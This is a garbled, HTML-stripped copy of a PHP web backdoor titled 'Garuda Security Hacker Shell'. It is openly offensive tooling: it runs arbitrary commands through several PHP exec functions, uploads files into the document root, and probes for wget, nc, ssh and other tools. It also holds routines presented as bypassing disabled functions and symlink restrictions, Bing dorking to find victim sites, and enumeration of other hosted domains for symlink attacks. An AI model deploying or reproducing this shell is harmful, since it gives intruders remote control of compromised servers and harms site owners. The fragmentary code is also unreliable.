Garuda Security Hacker Web Backdoor Access

Password



Garuda Security Hacker
".$perm.""; } else { return "".$perm.""; } } function r($dir,$perm) { if(!is_readable($dir)) { return "".$perm.""; } else { return "".$perm.""; } } function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function hdd($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } function getsource($url) { $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); $content = curl_exec($curl); curl_close($curl); return $content; } function bing($dork) { $npage = 1; $npages = 30000; $allLinks = array(); $lll = array(); while($npage <= $npages) { $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage); if($x) { preg_match_all('#

ON" : "OFF"; $ds = @ini_get("disable_functions"); $mysql = (function_exists('mysql_connect')) ? "ON" : "OFF"; $curl = (function_exists('curl_version')) ? "ON" : "OFF"; $wget = (exe('wget --help')) ? "ON" : "OFF"; $perl = (exe('perl --help')) ? "ON" : "OFF"; $python = (exe('python --help')) ? "ON" : "OFF"; $show_ds = (!empty($ds)) ? "$ds" : "NONE"; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } echo"

Garuda Security Hacker Shell 1.0 | Codename : I Miss You




"; // hanya homo yang mengganti judul dan gambar header ini tanpa izin echo'##########
'; echo "System: ".$kernel."
"; echo "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")
"; echo "Server IP: ".$ip." | Your IP: ".$_SERVER['REMOTE_ADDR']."
"; echo "HDD: $used / $total ( Free: $freespace )
"; echo'##########
'; echo "Safe Mode: $sm
"; echo "Disable Functions: $show_ds
"; echo'##########
'; if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") { echo "Magic Quotes : ON      "; } else { echo "Magic Quotes : OFF      "; } exec("perl --help", $perl); if ($perl) { echo "Perl : ON      "; } else { echo "Perl : OFF      "; } exec("python --help", $python); if ($python) { echo "Python : ON      "; } else { echo "Perl : OFF      "; } exec("ruby --help", $ruby); if ($ruby) { echo "Ruby : ON      "; } else { echo "Ruby : OFF      "; } exec("mysql --help", $mysql); if ($mysql) { echo "MySQL : ON      "; } else { echo "MySQL : OFF      "; } exec("node --help", $node); if ($node) { echo "Node JS : ON      "; } else { echo "Node JS : OFF      "; } exec("gcc --help", $gcc); if ($gcc) { echo "Gcc : ON      "; } else { echo "Gcc : OFF      "; } exec("wget --help", $wget); if ($wget) { echo "Wget : ON      "; } else { echo "Wget : OFF      "; } exec("curl_version", $curl); if ($curl) { echo "Curl : ON      "; } else { echo "Curl : OFF      "; } exec("git clone -h", $git); if ($git) { echo "Github : ON      "; } else { echo "Github : OFF      "; } exec("chmod --help", $git); if ($git) { echo "Chmod : ON      "; } else { echo "Chmod : OFF      "; } exec("ssh -h", $git); if ($git) { echo "SSH : ON      "; } else { echo "SSH : OFF      "; } exec("telnet -h", $git); if ($git) { echo "Telnet : ON      "; } else { echo "Telnet : OFF      "; } exec("nc -h", $git); if ($git) { echo "NC : ON      "; } else { echo "NC : OFF      "; } exec("ftp -h", $git); if ($git) { echo "FTP : ON      "; } else { echo "FTP : OFF      "; } echo "

"; echo'##########
'; echo "Current DIR: "; foreach($scdir as $c_dir => $cdir) { echo "
$cdir/"; } echo "  [ ".w($dir, perms($dir))." ]"; echo '
"; if($_GET['logout'] == true) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo ""; } elseif($_GET['do'] == 'upload') { echo "
"; if($_POST['upload']) { if($_POST['tipe_upload'] == 'biasa') { if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { $act = "Uploaded! at $dir/".$_FILES['ix_file']['name'].""; } else { $act = "failed to upload file"; } } else { $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['ix_file']['tmp_name'], $root)) { $act = "Uploaded! at $root -> $web"; } else { $act = "failed to upload file"; } } else { $act = "failed to upload file"; } } } echo "Upload File:
Biasa [ ".w($dir,"Writeable")." ] home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]
"; echo $act; echo "
"; } elseif($_GET['do'] == 'bypass') { ?>
Fungsi ini sebagai bypass symlink(internal server Error)
$korban
"; echo "Done .htaccess
"; $url_mkfile = "$korban?cmd=mkfile&name=$global&target=l1_Lw"; $post1 = array( "target" => "l1_$encode", "content" => "$decode_isi",); $post2 = array( "upload[]" => "@$global",); $output_mkfile = ngirim("$korban", $post1); $upload_ah = ngirim("$korban?cmd=upload", $post2); } } ?>
Fungsi ini sebagai bypass Disable Functions(Mod Security )
$korban
"; echo "Done php.ini
"; $url_mkfile = "$korban?cmd=mkfile&name=$global&target=l1_Lw"; $post1 = array( "target" => "l1_$encode", "content" => "$decode_isi",); $post2 = array( "upload[]" => "@$global",); $output_mkfile = ngirim("$korban", $post1); $upload_ah = ngirim("$korban?cmd=upload", $post2); } } ?>
Fungsi ini sebagai bypass Disable Functions(Mod Security )
$korban
"; echo "Done .htaccess1
"; $url_mkfile = "$korban?cmd=mkfile&name=$global&target=l1_Lw"; $post1 = array( "target" => "l1_$encode", "content" => "$decode_isi",); $post2 = array( "upload[]" => "@$global",); $output_mkfile = ngirim("$korban", $post1); $upload_ah = ngirim("$korban?cmd=upload", $post2); } } ?>


Klik Ini"; } ?>

Yeah Let's Try Bypass This Server And Smile




"; echo '
Virtual Hosting
"; $p = 0; error_reporting(0); $list = scandir("/var/named"); for($p = $min; $min <= $max; $p++) { $user = posix_getpwuid($p); if(is_array($user)){ foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); if($owner['name'] == $user['name']) { $i += 1; $cheechee = checkAlexa($domain); echo "
"; } } } } } echo "
Total Domains Found: ".$i."

"; } echo "
DomainsUsersSymlink
".$domain." - ".$cheechee."".$user['name']."
Dir


"; } ?>

Yeah Let's Try Bypass This Server And Smile




"; echo '